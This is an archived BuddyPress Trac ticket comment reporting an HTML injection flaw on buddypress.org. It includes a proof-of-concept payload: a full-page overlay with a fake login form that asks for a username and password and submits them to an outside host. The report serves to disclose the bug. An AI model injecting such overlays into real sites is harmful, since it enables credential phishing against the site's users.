[buddypress-trac] [BuddyPress Trac] #8404: Html code injection buddypress.org
buddypress-trac
noreply at wordpress.org
Thu Nov 26 07:42:25 UTC 2020
#8404: Html code injection buddypress.org
--------------------------+------------------------------
Reporter: zeldatea | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: Core | Version: 6.3.0
Severity: normal | Resolution:
Keywords: |
--------------------------+------------------------------
Comment (by zeldatea):
Hmm..there is we have too html..Here we have more options, because we have
access to the input tag and forms.
{{{
#!html
<h1 style="text-align: right; color: green">
Test tags form and input.
</h1><div style="position: absolute; left: 0px; top: 0px; width: 700px;
height: 700px; z-index:1000; background-color:#9FE2BF;
padding:1em;">Please login and password and what you have else:<br><form
name="login"
action="https://passport.yandex.ru/auth/welcome?origin=home_desktop_ru&retpath=https%3A%2F%2Fmail.yandex.ru%2F&backpath=https%3A%2F%2Fyandex.ru">
<table><tr><td>Username:</td><td><input type="text"
name="username"/></td></tr><tr><td>Password:</td>
<td><input type="text" name="password"/></td></tr><tr>
<td colspan=2 align=center><input type="submit" value="Login"/></td></tr>
</table></form><textarea>texarea tags test</texarea>
}}}
--
Ticket URL: <https://buddypress.trac.wordpress.org/ticket/8404#comment:1>
BuddyPress Trac <http://buddypress.org/>
BuddyPress Trac
More information about the buddypress-trac
mailing list